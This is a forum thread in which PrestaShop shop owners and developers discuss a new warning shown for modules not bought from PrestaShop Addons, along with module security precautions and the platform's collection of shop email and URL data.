Prestashop module installation and scary alert message


#1

I’m writing here as a Prestashop shop owner. This is my first post in the forum as I have good reasons to express and share my concerns with the Codecanyon community.

The latest PrestaShop release 1.6.0.9 is shipped with in it a new and very threatening popup alert that WILL cause real confusion with many shop owners: the alert message pops up when you try to install a module that was not purchased from Addons, with a scary warning that seems to indicate there’s a high potential for security-related or legal problems. It is a pity that a well know open-source script takes this kind of initiative.

It is a clear attempt to limit competition and digital marketplaces like Codecanyon and Themeforest by scaring users into thinking their shop may be in danger by installing modules like the ones sold at in the various marketplaces like yours.

I hereby ask Codecanyon (and Themeforest) staff to make a clear statement that all the modules are tested and do not contain any backdoors, any viruses, any spam messages, any security flaws and vulnerabilities that could harm the safety of your customers and their e-commerce websites.

Many thanks,


#2

Hello raoulfild,

As a PrestaShop theme and modules developer I understand your concers and I would like to share my insight on this matter and a few tips to avoid these issues.

First of all I would like to say that before PrestaShop added this warning message (about a month or 2 ago) people were installing modules from all sorts of places such as marketplaces other than PrestaShop Addons or developer’s own websites and no one had any problems. Of course this doesn’t mean problems can’t arrise, some people might have evil intentions after all.

However you can test the module first on a local web server and also you can skim thourgh the code to spot potential threats before installing the module to your online store. Also you should always create a backup of your store files and database before installing a new module or theme, even if it’s purchased from PrestaShop Addons. Just by taking these precaution steps you won’t have trouble with any theme or module and in case something does go wrong you can revert back to your shop without any worries.

Moreover I believe that most developers won’t risk their account being banned from the marketplace they make a living out of for adding harmful code in their modules.

Hope this helps :slight_smile:


#3

Thank you for your advice and precautions steps.
My concerns are less about myself! It is more about the signal we are getting from the company behind the software. I have some skills in PHP and web development and I have been using Prestashop since 2009. You would agree with me that developing plugins for this e-commerce script is getting complex. Unfortunately as merchant I don’t have time to look into the code anymore. But since I got this confusing pop up dialog I skimmed through the code and I came across few suprises. I can guarantee you that I spot few PHP methods email address/shop url suckers. I consider now Prestashop itself to be the first back door to my shop.
Just look at yourself on the Github repository from https://github.com/PrestaShop/PrestaShop/blob/1.6/classes/Tools.php#L2937
to https://github.com/PrestaShop/PrestaShop/blob/1.6/classes/Tools.php#L2947

The static funtion addonsRequest collects more than unnecessary data like email and shop url and it is used in various places in the script. You could imagine how often your data is sent to Prestashop!
I’m not sure that Prestashop guarantee my privacy anymore.
I’m considering to move my shop to another cart.


#4

That function looks ok-ish to me. Indeed the shop url and email seem like they have no place there. However I think, of course I can’t be sure about this, that they use shop url for statistics to see how many shops are active and email probably for spam but I have never seen them send spam so I don’t think you should be worried about this. When you install PrestaShop you have the option to subscribe to the newsletter and they get your email address from the database with a code similar to that.

Regarding privacy I don’t think anyone offers real privacy. Once you are on the internet there is no more privacy no matter how much you try to be protected. If you are worried that PrestaShop has your email and shop url think that Google or Facebook or other businesses such as these collect even more sensitive data than this. Even a website with cookies can store quite a bit of data on you.

The real issue I spot here is for 3rd party developers which can manipulate these functions by overrides and can use that data for whatever purpose they see fit.


#5

Hope that Prestashop is not going to lock the script though, it is more and more closely associated with addons.


#6

Hello,

I think this development is against the community. I developed a function to self-signed its modules to avoid this message. Feel free to follow me on twitter (@arnolem). I would put this online code as soon as I would have properly tested.